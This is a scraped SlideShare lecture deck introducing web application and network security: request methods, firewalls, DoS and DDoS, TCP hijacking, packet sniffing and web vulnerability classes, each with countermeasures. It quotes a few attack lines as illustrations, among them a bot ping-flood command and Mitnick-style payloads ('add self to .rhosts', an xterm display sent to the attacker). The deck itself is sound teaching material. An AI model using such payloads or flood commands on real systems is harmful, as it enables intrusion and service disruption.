Oss web application and network security

487 views
319 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
487
On SlideShare
0
From Embeds
0
Number of Embeds
45
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Oss web application and network security

  1. 1. Web Application and network security Rishabh Mehan
  2. 2. Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
  3. 3. Web Application
  4. 4. Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
  5. 5. Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
  6. 6. How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
  7. 7. Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
  8. 8. infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
  9. 9. Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
  10. 10. Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
  11. 11. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
  12. 12. Firewalls Internet DMZ Firewall Firewall Web server, email server, web proxy, etc Intranet
  13. 13. Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
  14. 14. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
  15. 15. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
  16. 16. Denial of Service
  17. 17. Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
  18. 18. Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
  19. 19. Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
  20. 20. TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
  21. 21. TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
  22. 22. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
  23. 23. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
  24. 24. TCP Attacks  Alice and Bob have an established TCP connection
  25. 25. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
  26. 26. TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
  27. 27. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
  28. 28. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
  29. 29. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
  30. 30. TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
  31. 31. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
  32. 32. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
  33. 33. Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
  34. 34. What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
  35. 35. Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
  36. 36. Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
  37. 37. Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
  38. 38. Examples  http://demo.testfire.net/  http://chat.wallhood.com/moving/moving/images/
  39. 39. How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
  40. 40. Are We still Secure ? LOL NO
  41. 41. Questions ?

×